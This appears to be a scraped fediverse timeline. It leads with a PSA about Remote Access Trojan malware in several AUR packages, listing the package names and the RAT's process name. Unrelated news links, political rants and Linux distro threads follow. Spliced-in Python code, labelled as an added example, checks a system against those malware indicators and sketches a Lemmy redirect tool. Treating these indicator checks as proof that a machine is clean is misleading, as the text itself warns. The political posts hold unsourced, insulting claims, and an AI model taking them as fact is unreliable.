[PSA] Malware distributed on the AUR
On the 16th of July, at around 8pm UTC+2, a malicious AUR package was
uploaded to the AUR. Two other malicious packages were uploaded by the
same user a few hours later. These packages were installing a script
coming from the same GitHub repository that was identified as a Remote
Access Trojan (RAT).
The affected malicious packages are:
- librewolf-fix-bin
- firefox-patch-bin
- zen-browser-patched-bin
The Arch Linux team addressed the issue as soon as they became aware of
the situation. As of today, 18th of July, at around 6pm UTC+2, the
offending packages have been deleted from the AUR.
We strongly encourage users that may have installed one of these
packages to remove them from their system and to take the necessary
measures in order to ensure they were not compromised.
Follow up
More packages with this malware have been found:
- minecraft-cracked
- ttf-ms-fonts-all
- vesktop-bin-patched
- ttf-all-ms-fonts
What to do
If you installed any of these packages, check your running processes for one named systemd-initd (this is the RAT).
The suspicious packages have a patch from this now-inaccessible Codeberg repo:
codeberg.org/arch_lover3/brows…
The Arch maintainers have been informed of all this already and are investigating.
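The two checks the PSA asks affected users to perform, written out as an added Python example; this is not code from the Arch team or from the follow-up post. The package names and the `systemd-initd` process name are the ones the PSA lists; `pacman -Qq` and `/proc/<pid>/comm` are the standard places to read installed packages and process names on an Arch system. The check functions take plain Python data, so they can also be run against a package list or process table captured from another machine.

```python
#!/usr/bin/env python3
"""Triage helper for the AUR malware PSA above (added example, not Arch's code).

Two checks, both taken from the PSA:
  1. is any of the named malicious packages installed (pacman -Qq)?
  2. is a process named `systemd-initd` (the RAT, per the PSA) running?
The check functions take plain Python data, so they can also be run against a
package list or process table captured from another machine.
"""
from __future__ import annotations

import os
import subprocess
from typing import Iterable

# Package names exactly as listed in the PSA and its follow-up.
MALICIOUS_PACKAGES = frozenset({
    "librewolf-fix-bin",
    "firefox-patch-bin",
    "zen-browser-patched-bin",
    "minecraft-cracked",
    "ttf-ms-fonts-all",
    "vesktop-bin-patched",
    "ttf-all-ms-fonts",
})

RAT_PROCESS_NAME = "systemd-initd"  # process name given in the PSA


def find_affected_packages(installed: Iterable[str]) -> list[str]:
    """Malicious package names present in an installed-package list, sorted."""
    return sorted(MALICIOUS_PACKAGES.intersection(p.strip() for p in installed))


def find_rat_processes(proc_table: Iterable[tuple[int, str]]) -> list[int]:
    """PIDs whose comm name equals the indicator exactly.

    Exact comparison on purpose: legitimate systemd helpers (systemd,
    systemd-journald, systemd-udevd, ...) must not show up as hits.
    """
    return sorted(pid for pid, comm in proc_table if comm.strip() == RAT_PROCESS_NAME)


def triage(installed: Iterable[str], procs: Iterable[tuple[int, str]]) -> dict:
    """Combine both checks; 'clean' means neither indicator was seen."""
    packages = find_affected_packages(installed)
    pids = find_rat_processes(procs)
    return {"packages": packages, "rat_pids": pids, "clean": not packages and not pids}


def installed_packages() -> list[str]:
    """Live host: names of all installed packages from pacman."""
    out = subprocess.run(["pacman", "-Qq"], capture_output=True, text=True, check=True)
    return out.stdout.split()


def proc_table() -> list[tuple[int, str]]:
    """Live host: (pid, comm) for every process, read from /proc."""
    table = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                table.append((int(entry), fh.read().strip()))
        except OSError:
            pass  # the process exited between listdir() and open()
    return table


if __name__ == "__main__":
    result = triage(installed_packages(), proc_table())
    if result["clean"]:
        print("no indicator from the PSA found")
    else:
        for name in result["packages"]:
            print(f"installed malicious package: {name} (remove it, per the PSA)")
        for pid in result["rat_pids"]:
            print(f"running process named {RAT_PROCESS_NAME}: pid {pid}")
```

A "clean" result only means these two indicators are absent right now; a process can be renamed and a package can be uninstalled after its install script has run, so the PSA's advice to take further measures still applies to anyone who had one of the packages installed.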
Washington wants the Ukrainian president to leave office—will it happen?
THE END FOR ZELENSKY?
Seymour Hersh
Israel can never take Hezbollah's weapons
TEHRAN, Jul. 18 (MNA) – The chief of Lebanon's Hezbollah, Sheikh Naim Qassem, says that the Israeli regime will never be able to take Hezbollah's weapons, and they are ready to defend themselves in the event of Israeli aggression. Mehr News Agency
Pashinyan Acts As Copycat NATO-Backed Dictator And Is Turning Armenia Into Western Vassal – Expert
The legal conditions imposed by Armenian Prime Minister Nikol Pashinyan on the businessman and philanthropist Samwel Karapetyan are meaningless, Stevan Gajic, a political analyst from the Belgrade Institute of European Studies, says, noting that the … Sputnik International
There's a deep historical connection between Armenia (a former Soviet nation) and Russia that goes beyond politics. Russia has historically maintained influence on other nations to protect their own interests.
Anyone stupid enough to buy America's neo-liberal freedom spreading bullshit and willingly gives up their children's futures for quick loans to do short term improvements that were needed in part because of US sanctions is an idiot, and unfortunately like any other country, Armenia is full of idiots.
You'd think of all countries Armenia would be the first to speak up against Israel's genocide, with a quickly shrinking diaspora of Armenian Genocide survivors being persecuted in Palestine... But no, they wanted to make pappa USA proud and sided with Israel instead.
Armenia sold its future to help the dying American empire bounce back, and so did Lebanon. So tired of war, they let the US build a massive city-sized military compound with an airport on the top of a very strategic mountain and let them call it an embassy. People never learn.
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
YouTuber claims to “have receipts” disproving Apple’s allegations. Andrew Cunningham (Ars Technica)
Meta refuses to sign EU's AI code of practice | TechCrunch
Meta will not sign the EU's new rules, calling the implementation "over-reach". Ram Iyer (TechCrunch)
This, plus the recent 'pay or consent' fiasco, makes pretty clear they are going straight for a deliberate collision route with the EU.
I assume they got some kind of political backing for it, it's a quite sudden all in. Sigh.
EDIT: Wrong link
Unicorndog
Also, George Takei was in the US concentration camp as a child, so...
Holy shit, it's true!😮
Also, that thing about George Takei, too, yeah. (HOLY SHIT!!)
Fediverse Village at HOPE
From August 15-17 2025, SWF will be helping to bring the Fediverse to HOPE. HOPE (Hackers on Planet Earth) is a grass-roots conference for hackers and developers in Queens in New York City. This year, I (Evan) will be speaking at the event on Aug 15 at 2PM ET, and we (SWF) will be organizing a Fediverse Village for HOPE_16.
Villages are themed spaces available on the St. John’s University campus to be used for coordinating activities. We’re hoping (!) to have talks, meetings, hacking events, and social gatherings at the Fediverse Village.
If you are involved in the Fediverse – or want to be – please join us at HOPE. There will be a lot of interesting and exciting things happening. And if you have good ideas for things to do at the Fediverse Village, please comment or let me know at @evanprodromou@socialwebfoundation.org.
[HOPE_16] Welcome to Hackers On Planet Earth!
HOPE_16 is an all-ages event with at least four speaker tracks, a whole bunch of workshops, awesome vendors, and fun activities throughout the entire weekend. hope.net
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
cross-posted from: lemmy.ml/post/33345095
News Desk
JUL 18, 2025
Israeli Prime Minister Benjamin Netanyahu has agreed to a withdrawal of troops from the Morag Corridor in southern Gaza, according to Hebrew reports, after several days of disagreements in indirect talks between Israel and Hamas over where Israeli forces would withdraw from during a potential ceasefire deal.
Sources told Yedioth Ahronoth that a deal has been reached between Israel and Hamas on the latest withdrawal maps provided by Tel Aviv to mediators, after it conceded on the issue of the Morag Corridor.
Netanyahu stated in closed meetings that the Israeli delegation will remain in Qatar’s capital Doha until agreements are reached, and estimates suggest he is determined to secure a deal, according to the report.
A Prominent OpenAI Investor Appears to Be Suffering a ChatGPT-Related Mental Health Crisis, His Peers Say
Bedrock co-founder Geoff Lewis has posted increasingly troubling content on social media, drawing concern from friends in the industry. Joe Wilkins (Futurism)
In this case, the United States. When healthcare is expensive and hard to access, not everybody gets it.
Syphilis symptoms can be so mild they go unnoticed. When you combine that with risky sexual behavior (hook-up culture, anti-condom bias) and lack of testing due to inadequate medical care, you can wind up with untreated syphilis. If you become homeless, care gets even harder to access.
You get diagnosed at a late stage when treatment is more difficult. They put you on a treatment plan, but followup depends on reliable transportation and the mental effects of the disease have made you paranoid. Now imagine you're also a member of a minority on which medical experiments have historically been done without consent or notice.
You don't really trust that those pills are for what you've been told at all. So difficulty accessing healthcare, changing clinics as you move around with medical history not always keeping up, distrust of the providers and treatment, and general instability and lack of regular routine all add up to only taking your medication inconsistently.
Result: under-treated syphilis
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
The premier is said to have agreed on a withdrawal of Israeli forces from the Morag Axis, which was established earlier this year and solidified Tel Aviv’s control of south Gaza. thecradle.co
I have an idea to prevent broken links from Lemmy instances that are shutting down
There will be a lot of lemm.ee/p/123 links around. As far as I understand, any server that federated with lemm.ee (e.g. lemmy.world) will continue to host the federated communities and posts forever.
So here's my proposal. We build a simple tool that says, when you visit lemm.ee/p/123, we check if that post exists on lemmy.world and forward you there. Doesn't necessarily have to be lemmy.world. We could even present the user with multiple instances to resolve the post from.
If you're interested in how this would work, it would utilize the resolve_object endpoint, which both Lemmy and PieFed implement.
Here are some examples of how you can still look up lemm.ee posts via the API of other instances:
- lemmy.world/api/v3/resolve_obj…
- lemmy.world/api/v3/resolve_obj…
- lemmy.world/api/v3/resolve_obj…
- lemmy.zip/api/v3/resolve_objec…
- lemmy.zip/api/v3/resolve_objec…
- piefed.social/api/alpha/resolv…
- piefed.world/api/alpha/resolve…
For this to really work smoothly, whoever owns the domains of the shut down instances would have to host this tool (e.g. lemm.ee would have to host it at lemm.ee). I have no idea how to get in touch with whoever owns the domain, but I would be happy to help build this.
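The forwarding tool sketched above, as an added Python example that is not the poster's code. The instance list and the two API paths (`/api/v3/resolve_object` for Lemmy, `/api/alpha/resolve_object` for PieFed) are the ones in the post; the response shape `{"post": {"post": {"id": N, "ap_id": "..."}}}` and the instance-local page `https://<instance>/post/<id>` are assumptions about the Lemmy v3 API, and PieFed is assumed to answer with the same shape. The sample responses are constructed so the code runs offline; `fetch_json` is the live fetch you would use on the real domain.

```python
#!/usr/bin/env python3
"""Added example, not the poster's code: resolve a post from a shut-down Lemmy
instance through other instances' resolve_object endpoints and pick a redirect.

Labelled assumptions: the Lemmy v3 resolve_object response carries the post as
{"post": {"post": {"id": N, "ap_id": "<original url>"}}} and the instance-local
page is https://<instance>/post/<id>; PieFed's alpha endpoint is assumed to answer
with the same shape. Every sample response below is constructed for the demo.
"""
from __future__ import annotations

import json
import re
import urllib.parse
import urllib.request
from typing import Callable, Iterator, Optional

# Instances and API paths from the post, in preference order.
CANDIDATES = [
    ("lemmy.world", "/api/v3/resolve_object"),
    ("lemmy.zip", "/api/v3/resolve_object"),
    ("piefed.social", "/api/alpha/resolve_object"),
]

# Only post paths are forwarded; anything else on the dead domain gets no redirect.
# "/p/<id>" is accepted because the post writes its example links that way (assumption).
_POST_PATH = re.compile(r"^/(?:post|p)/(\d+)/?$")


def original_post_url(dead_domain: str, path: str) -> Optional[str]:
    """Canonical URL of the post on the shut-down instance, or None for other paths."""
    m = _POST_PATH.match(path)
    return f"https://{dead_domain}/post/{m.group(1)}" if m else None


def resolve_url(instance: str, api_path: str, original: str) -> str:
    """resolve_object query for `original` on `instance` (q is percent-encoded)."""
    return f"https://{instance}{api_path}?q={urllib.parse.quote(original, safe='')}"


def local_post_url(instance: str, response: dict, original: str) -> Optional[str]:
    """Instance-local URL for the resolved post, or None.

    The ap_id the instance returns must be the post we asked for: a stale or
    wrong object must not turn into a redirect to an unrelated page. The target
    is built from our own candidate list plus an integer id, so a caller-supplied
    URL can never become an open redirect.
    """
    post = response.get("post", {}).get("post", {}) if isinstance(response, dict) else {}
    post_id = post.get("id")
    if not isinstance(post_id, int) or post.get("ap_id") != original:
        return None
    return f"https://{instance}/post/{post_id}"


def fetch_json(url: str, timeout: float = 5.0) -> dict:
    """Live fetch; replaced by fetch_from_table() in the demo and tests."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def fetch_from_table(table: dict) -> Callable[[str], dict]:
    """Offline stand-in for fetch_json, keyed by instance hostname."""
    def fetch(url: str) -> dict:
        host = urllib.parse.urlparse(url).netloc
        if host not in table:
            raise OSError(f"{host}: unreachable (simulated)")
        return table[host]
    return fetch


def iter_redirects(original: str, fetch: Callable[[str], dict] = fetch_json,
                   candidates=CANDIDATES) -> Iterator[str]:
    """Yield an instance-local URL for every candidate that can serve the post."""
    for instance, api_path in candidates:
        try:
            data = fetch(resolve_url(instance, api_path, original))
        except Exception:
            continue  # instance down, timeout or HTTP error: try the next one
        target = local_post_url(instance, data, original)
        if target:
            yield target


def find_redirect(original: str, fetch=fetch_json, candidates=CANDIDATES) -> Optional[str]:
    """First working redirect in preference order, or None if nobody has the post."""
    return next(iter_redirects(original, fetch, candidates), None)


def find_all_redirects(original: str, fetch=fetch_json, candidates=CANDIDATES) -> list[str]:
    """Every working redirect, for a 'choose the instance to read it on' page."""
    return list(iter_redirects(original, fetch, candidates))


# Constructed sample responses: lemmy.world has the post, lemmy.zip answers with a
# different post (rejected by the ap_id check), piefed.social is unreachable.
SAMPLE_RESPONSES = {
    "lemmy.world": {"post": {"post": {"id": 777, "ap_id": "https://lemm.ee/post/123"}}},
    "lemmy.zip": {"post": {"post": {"id": 9, "ap_id": "https://lemm.ee/post/999"}}},
}

if __name__ == "__main__":
    original = original_post_url("lemm.ee", "/p/123")
    print(find_all_redirects(original, fetch_from_table(SAMPLE_RESPONSES)))
```

The two checks worth keeping if this is ever deployed on the dead domain are the path allow-list (only post URLs are forwarded) and the `ap_id` comparison: without the latter, an instance that answers with a cached or different object would send the visitor to the wrong page, and since the target host always comes from the tool's own candidate list, the visitor-supplied path cannot be abused as an open redirect.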
Yeah absolutely! But it does feel more useful to have it live on the domain if possible.
I run my own Lemmy/PieFed client. I'm trying to think if there is a way to tell if an instance has shut down without hard coding a list. The hard part imo is telling if an instance is shut down vs temporarily down.
Though as I write this, I suppose this same feature could be used to resolve a post if an instance is temporarily down. So maybe I just ping /nodeinfo/2.1 and if it times out, I redirect.
What if an instance wants to disappear?
Edit: Oh, I see, this would be a service provided by whoever owns the shut-down domain.
Before Vegas: The “Red Hackers” Who Shaped China’s Cyber Ecosystem
This CSS Cyberdefense report by Eugenio Benincasa examines how a core group of red hackers from the 1990s and 2000s laid the groundwork for China’s modern cyber capabilities and traces their trajectories from early red hacker groups into professional… Center for Security Studies
Russia gearing up to prosecute internet users for searching ‘extremist’ content
Berlin, July 18, 2025—The Committee to Protect Journalists is alarmed by a bill under consideration in the Russian State Duma that would introduce fines for accessing or searching for “extremist” online content, threatening to further restrict press … CPJ Staff (Committee to Protect Journalists)
Sotto il cielo di Trevi (PG) lights up the summer with theatre and music; the season runs from 19 July to 30 August 2025
From 19 July to 30 August the magic of the festival “Sotto il cielo di Trevi – Musica e teatro nel paesaggio” returns to Trevi, promoted by Antonio Salines’s Teatro Belli under the patronage of the municipality. A programme that turns villages, squares and parks into open-air stages, with shows, emotions and encounters.
Villa Fabri, the Church of San Lorenzo, the Parco Agricolo, Piazza Mazzini, Matigge and Cannaiola will host artists and companies in evenings devoted to culture, reflection and entertainment.
Opening the festival on 19 July is Goldoni’s “L’impresario delle Smirne” with Gigi Savoia, followed on 20 July in Matigge by “Contaminazioni poetiche”, a mix of poems and folk songs. On 26 July Edoardo Siravo plays Ahab in “Moby Dick”, while on 28 July Plautus’s “I Menecmi” is staged.
On 1 August, “Voci di donne – Lettere a Mascagni” explores the role of women in the composer’s works; on 3 August, between music and gastronomy, “Rossini e i sapori della musica”. On 4 August a tribute to Pasolini with “Tutto il mio folle amore lo soffia il cielo”; on 5 August “Per futili motivi”, a dystopian satire on a society founded on hatred.
On 22 August Dostoevsky’s “Dreamer” comes to life at the Parco Agricolo; on the 23rd, a free itinerant theatrical tour, “Trevi, ovvero vissi d’amore e di merangole”. On the 24th, at the Church of San Francesco, “Domenico, un uomo buono”, about Saint Dominic of Foligno.
On 29 August, a concert show by Baraonna in Piazza Mazzini. The festival closes on 30 August in Cannaiola with “Canzoni sulla Luna” by the group The Eldar.
Tickets: €10 at Villa Fabri, €3 elsewhere. Info: 327 818 4788 – compagnia@teatrobelli.it – Presales on VivaTicket.
Sotto il cielo di Trevi (PG) lights up the summer with theatre and music, the season on stage from 19 July to 30 August 2025 - ViaggieMiraggi
“Sotto il cielo di Trevi” lights up the summer with theatre and music. From 19 July to 30 August 2025 the magic of the summer season by Antonio Salines’s Teatro Belli returns, with shows, emotions and encounters among the streets, the parks... Redazione (ViaggieMiraggi)
Trump can basically print infinite amounts of dollars through the federal reserve.
As we all know, conflicts are hella expensive and often decided by who can stay solvent longer. The fact that trump can just print dollars is extremely problematic here.
I guess the necessary course of action would be to bring the dollar's value to zero, and use an alternative currency instead (such as euro, canadian dollar, mexican pesos).
Festa del Vino: in Pergola (PU), from 25 to 27 July 2025, the 20th anniversary of the Pergola DOC is celebrated
From Friday 25 to Sunday 27 July, the historic centre of Pergola, one of the Borghi più Belli d’Italia, hosts the 53rd edition of the Festa del Vino, organised by the Pro Loco under the patronage of the municipality. A special edition celebrating 20 years of the Pergola DOC, a local excellence that is increasingly appreciated.
Three days of initiatives devoted to Pergola’s “Oro Rosso” (red gold), between tastings, reflection and festivities. Friday at 7.30 pm, under the arcades of Piazza Garibaldi, the event “A cena con Aleatico & Lacrima”: a guided tasting of 9 wines (including Pergola DOC, Uva Nera Rada and Lacrima di Morro d’Alba DOC), led by sommelier Raffaele Papi, vice president of AIS Marche, with stories and curiosities from the producers. Paired with a special menu by chef Filippo Petrolati. Booking required (tel. 388.0732931).
Saturday at 5.30 pm in the council chamber, the round table “20 anni di Pergola Doc”, with producers and experts such as Alberto Mazzoni (IMT), Luca Gambucci (AIS Marche Fabriano) and producer Stefano Tonelli, retracing the history and cultural value of the Pergola DOC. Moderated by Ubaldo Alimenti. Followed by a tasting under the arcades.
Over the weekend, the wine cellars of the historic centre will offer tastings of Pergola DOC and local specialities, accompanied by music, entertainment, workshops, art, a children’s area and plenty of hospitality.
Info: Pro Loco Pergola social media.
Festa del Vino, in Pergola (PU) from 25 to 27 July 2025 the 20th anniversary of the Pergola DOC is celebrated - ViaggieMiraggi
Festa del Vino, Pergola celebrates 20 years of the Pergola DOC. 25 to 27 July 2025: 3 days full of initiatives. A sensory journey through tradition, taste and conviviality will take off on Friday 25 July, when in Pergola... Redazione (ViaggieMiraggi)
I've read that MAX (typical horse taste of modern Russian official names, similar to Rosgvardia, Gosuslugi, Rostech and so on ; Soviet-time many-many-many caps abbreviations are boring, but somehow better) in its current early versions is a piece of spyware looking like Telegram, literally saving passwords and banking data and browsing history. Well, I'm almost certain Telegram itself is not much better.
Installed Briar on my phone and persuaded my sister, and to my grandma's today.
I like the idea of these meshes but until Linux phones become a practical option it doesn’t matter. Apple will restrict the hardware, Google will let Gemini spy on anything that passes through the phone, the phone situation is a mess.
I don’t really blame governments for that either. I blame fucking business majors.
A little background info:
Russia's been sponsoring one of its oligarchs' business by eliminating their competition.
First, they restricted YouTube's speed to an unusable state to force people to switch to RuTube (they didn't)
Now they're trying to force people to switch from WhatsApp (and potentially Telegram) to MAX, which they want to be Russia's version of WeChat.
-
Add the fact that our politicians are obsessed with controlling all of the media and you'll get the gist of it.
DOGE staffer with access to Americans' personal data leaked private xAI API key | TechCrunch
The creator of DOGE gets a taste of what he created.
That's called poetic justice.
The researcher who found the exposed key said it “raises questions” about how DOGE handles sensitive data. Zack Whittaker (TechCrunch)
DXVK 2.7 Improves Support for God of War, Watch Dogs 2, and Final Fantasy XIV
cross-posted from: lemmy.dbzer0.com/post/49276678
Coming about three weeks after DXVK 2.6.2, the DXVK 2.7 release adds support for the VK_EXT_descriptor_buffer Vulkan extension by default on newer AMD and NVIDIA GPUs to significantly reduce CPU overhead in games like Final Fantasy XIV, God of War, Metaphor: ReFantazio, Watch Dogs 2, and others.
‘AI is not intelligent at all’: Why our dignity is at risk
The age of artificial intelligence (AI) has transformed our interactions, but threatens human dignity on a worldwide scale, according to a study led by Charles Darwin University (CDU). Charles Darwin University
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
According to the filing, Lipnik has been fired from Apple “for failing to follow Apple’s policies designed to protect its confidential information, including development devices and unreleased software and features.” The filing also accuses Lipnik of failing to report “multiple prior breaches” to Apple.
When you sign an NDA (non-disclosure agreement), you’d best protect the secrets. Then again, the guy who left an iPhone 4 in a bar didn’t lose his job. Wonder what the differences are between them.
China issues safety warning for its nationals studying in the Philippines
China’s Education Ministry has issued a safety warning for Chinese students in the Philippines, following what it describes as a series of criminal incidents targeting Chinese nationals.
Archived version: archive.is/newest/apnews.com/a…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
"Storia di un Guerriero Lakota. Sotto il blu di Skan" – An Epic Debut that Has Already Won Over Readers
Tim Walz says Trump ‘brings out the worst in people – and the worst in me’
Kamala Harris running mate strikes regretful tone after calling for Democrats to ‘bully the shit out of’ US president
Brazil passes controversial 'devastation bill' that weakens environmental regulations
Critics have called it "by far the worst piece of legislation” ever from an environmental standpoint.
Archived version: archive.is/newest/euronews.com…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
Taiwan will 'not provoke confrontation' with China, vice president says
Taiwan's vice president says the self-ruled democracy will not provoke a confrontation with China and seeks to communicate with Beijing on the basis of parity and respect.
Archived version: archive.is/newest/apnews.com/a…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
Arab Strap on tour in Rome: after 30 years of career still recognisable, even with a different style
The Scottish indie-rock duo, made up of Aidan Moffat and Malcolm Middleton, with thirty years of activity behind them, returns to Italy after the release of I'm Totally Fine with It Don't Give a Fuck Anymore, out last 10 May. Three Italian tour dates: 23 July at the Anfiteatro del Venda in Galzignano Terme, 24 July at Monk in Rome and 25 July at the Giardino Scotto in Pisa.
With their latest album Arab Strap do not seem at all concerned with staying faithful to the sonic identity that, while evolving each time, has made them unique and distinguishable over the years. Bliss and Allatonceness, the singles that preceded the launch of their eighth studio effort, are two profoundly different tracks that stand as proud testimony to their focus on the future, on change and on evolution.
I'm Totally Fine with It Don't Give a Fuck Anymore is a record full of powerful, incisive tracks, both in the upbeat nature of some of its most propulsive musical moments and in the bite of Moffat's lyrics. "Compared to our previous album, there's more anger and aggression in the words," he says. "It's not openly political but it's definitely a record that's a bit angry at the world."
The title (literally, "I'm totally fine with it, I don't give a f... anymore") might give the impression of a band surrendering to something; in reality it refers to a message from the band's live drummer that Moffat found very funny, and it ends up reflecting the start of a new period of creative freedom for Arab Strap.
i've been testing debian trixie with plasma wayland on nouveau and it looks promising
trixie (aka debian 13) is about to get released with plasma 6.3. it seems that finally x11 is being left behind, which is good, but it worried me a little bit because
- my nvidia graphics card is old: the 470 driver is the latest version that supports it (so no wayland support from nvidia proprietary drivers ever)
- on bookworm (debian 12, the current stable version), nouveau works pretty well, but it crashed more or less daily when i tried to daily drive it at work
x11 is still very well supported by plasma 6, but the near future has no place to it and i worry i would eventually get stuck without updates to my system as the newer versions lose x11 support. i decided to try wayland+nouveau again on trixie to see if i had better luck this time
it all worked way better than i expected. performance is seemingly on par with the proprietary driver, i've had no crashes so far and i've been using it for a week and even screensharing, one of the most problematic aspects of the experience last time i tried, worked well. the one problem i had was with the slack flatpak, which didn't support wayland for some reason, so it had to run on xwayland. screen sharing wayland applications from x11 apps is possible through the xwaylandvideobridge, which kinda works, but it crashed xwayland entirely at one point, killing both x11 applications i had running. i won't blame that on the system itself and installing the slack deb package fixed the problem anyway
all in all, it seems like i can safely switch to plasma 6+wayland+nouveau at work
A huge problem with Debian Trixie is that it is shipping with NVIDIA drivers from before explicit sync was added (over a year ago). This is crazy to me.
But if you want to stay on X11, Debian Stable will support it for quite a few years yet even after KDE drops support.
If you are going to use Wayland (I do), it is worth using back ports to get newer NVIDIA drivers.
Debian Stable should really be called Debian Static (unchanging). Because they can ship unstable (crashy) software for years after other distros have moved on.
Distro advice for a specific case.
Back again haha, I asked a little while ago about making the switch from Windows to Linux and general consensus was maybe don't, as I use my PC for work doing voice acting, music production, and digital art.
Anyway, my PC has been crashing lately so I may be at the point soon of re-installing my OS, so I may as well bite the bullet if/when that happens. Right now I'm making some backups, making a list of Linux programs I'll need, and just trying to get my ducks in a row so I'm not scrambling if I wake up one morning and have to do the thing. Which brings me to Distros.
I've done some research into it but already but there are a bunch of options (thinking maybe Bazzite or Fedora?), and I'd rather know what I'm going with if my PC dies so I don't have to waste time trying to figure it out then. My PC specs are:
Processor 11th Gen Intel(R) Core(TM) i5-11400F @ 2.60GHz 2.59 GHz
Installed RAM 16.0 GB (15.9 GB usable)
NVIDIA GeForce RTX 3060
Obviously the priority is to get up and running but I'd really like to use a distro that I can learn some as well. I've installed Mint on an old laptop (recommended for being similar to Windows) but ideally I'd like a distro that's a bit more Linux-y. I'm ok taking some extra time getting up and running, though I'm not at a point for something like Arch yet haha.
EDIT: Wow, lots of comments, thanks! I think I've been overthinking it overall based on these responses. I have Mint on my old laptop and it works well, but had issues on my main laptop (Samsung Book3 Ultra) which I've read has to do with Samsung in general. I also had some issues with Nvidia on it but that may have been a Samsung issue more than anything else. My main PC uses Nvidia so I was under the impression that some distros just don't play well with it and wanted to make sure I used one that worked well with that graphics card.
Bottom line, I've been looking into Linux over the past few weeks and there's still distros mentioned here that I've never heard of haha. It seems really intimidating (hence why I asked) but I'm getting the impression that, at least for now, I'll just go Fedora to start when I bite the bullet. Arch looks really interesting but again, seems intimidating coming from Windows.
rottenness, wastefulness and the morning in the big crapper
I still don't understand what universal logic it is that every now and then (rather, every very often) causes the stability of my soul to crumble heavily, but, be that as it may, this morning it happened again… And it is still going on now, in the afternoon, even though, oh well, now there are the various things to do, and so the rot doesn't take hold more than […]
copygirl
in reply to Mark
The "Arch cult's" holy book, the ArchWiki, states the following pretty clearly:
Mention of one's use of the AUR for their needs doesn't need to come with a disclaimer.
People who don't read or don't use their brain are going to keep not doing so, regardless.
AntennaArray
in reply to copygirl
Well, it's not like cults were known for actually following their holy books
Fecundpossum
in reply to DirkMcCallahan
The AUR, key words “user repository”, is a specific weak point. It doesn’t have the same level of oversight that the main Arch repo has. Stick to main repos and verified flatpaks and it’s very unlikely that you’d ever be compromised.
Linux isn’t perfect, but it’s certainly better than windows where you just download executables willy nilly to install your software.
HaraldvonBlauzahn
in reply to Fecundpossum
BTW Python's package index has roughly the same problem - but a far less technical, experienced and critical user base. NPM has had this problem for years.
Expect these problems to rise with every additional percent of new Linux users who never learned the difference between opening / viewing untrusted data and running untrusted code, because Windows basically ignores this essential concept and Android tries to solve it by sandboxing each app.
Nibodhika
in reply to DirkMcCallahan
That is sound advice; the AUR is most definitely not a trusted source though. For the normal Arch repos the people who put the stuff there are known, they work for the project, you're as likely to get malware from one of those as you are to read an article bashing GameSpot on GameSpot; the people in charge of putting the packages there are the ones with the most vested interest in things working, so they won't knowingly introduce malicious code (plus it's a handful of people who know each other by first name).
The AUR is a different story, because anyone can put stuff there it's very easy to have malicious code end up there. It doesn't happen that often because most of the time it's fairly obvious and it gets flagged straight away, plus if people start doing that people will migrate away from the AUR, so it's a high risk low reward situation. But as more and more people start to use Arch derivatives that come with the AUR enabled without understanding any of this it becomes a more rewarding thing to exploit.
NuXCOM_90Percent
in reply to DirkMcCallahan
Yeah. The I'm A Mac crowd had the same problem... god damn it, two or three decades ago.
As market share increases, platforms become a much bigger target for malware. And a lot of the "I don't need to run virus scans" crowds learn the hard way.
It's the same with open source. Obviously NOBODY around here would parrot this bullshit, but there is the idea that because something is FOSS it is safe. Code is only as safe as code review, and there have been a few high-profile cases of social engineering to get malicious code past even fairly rigorous review. Let alone the "Well, that script is FOSS so somebody probably reviewed it" that we see so often.
bacon_pdp
in reply to Tundra
Only for distributions which don’t do reproducible builds and require full and complete corresponding source code under an FSF-approved license.
If you choose to download binary blobs, good fucking luck.
Elvith Ma'for
in reply to bacon_pdp • • •Mwa
in reply to Xylight • • •Voytrekk
in reply to Mwa • • •pyssla
in reply to Voytrekk • • •Sorry, but I fail to see this.
I suppose if you're counting literally all independent distros, then you're probably right. However, if we're more realistic and compare it to other well-established independent distros^[I'm basically counting Alpine, Debian, Fedora, Gentoo, openSUSE, Slackware, Solus and Void. I didn't count Guix System and NixOS because their 'repositories' are built differently and therefore not easily comparable to the others.], then we notice that the vastness of the packages found in Arch's repository is rather lackluster, to say the least. Heck, by virtually all metrics, Arch together with its derivatives undoubtedly belongs in the upper echelons of usage stats, second only to the Debian family of distros. IMO, however, the size of its repository absolutely doesn't reflect this, as it's only bigger than Slackware's, Solus's and Void's. The inclusion of these smaller projects is arguably charitable on my side*. But to drive the point home very clearly: Arch's repository is smaller than Alpine's, Debian's, Fedora's, openSUSE's and Gentoo's by a ratio of (about) two to one (except for openSUSE).
distrowatch.com
Voytrekk
in reply to pyssla
I don't know if raw package counts are the best comparison. Unlike, say, Fedora, Arch bundles everything related to a project in the same file. If you want Qt6-base on Arch, that is one package. If you want it on Fedora, it is going to be a lib, headers, docs, and maybe a few other packages.
Just from personal experience, I do not have issues finding packages in the main repos, with only a handful of my packages coming from the AUR. This is not the case with others, like Fedora, where extra repos need to be added, like EPEL and RPM Fusion.
pyssla
in reply to Voytrekk
Thank you for the quick response!
You're probably right. Do you think we have anything better to go by?
Can't comment on this. Though, the list of packages with qt6 in their name is considerably longer in Fedora. However, I wonder whether this simply reflects that Fedora, by virtue of having a larger repository, also has more stuff related to qt6, or, as you posited, chooses to package the same content over multiple packages instead of bundling them as supposedly happens on Arch.
Hmm..., I feel you might be conflating things. Please allow me to elaborate on what I mean.
Fedora is not able to include some packages in its own repository for legal reasons. As such, these are relegated to RPM Fusion instead, which means that a well-functioning Fedora installation (almost necessarily) needs to install some packages from RPM Fusion. So RPM Fusion exists as a 'hack' of sorts to protect Fedora from legal charges, and NOT because they're too lazy (or something) to ship those packages themselves. To be clear, RPM Fusion is accepted as a trusted third-party repository.
Arch, on the other hand, is rather lenient about what it can include in its repositories, basically enabling it to package all codecs and whatnot within its repositories without being visibly worried about the legal consequences of this.
To be honest, I don't know exactly where this discrepancy comes from, but I wouldn't be surprised if it's related to how Arch is basically a genuine community distro while Fedora has official ties to Red Hat.
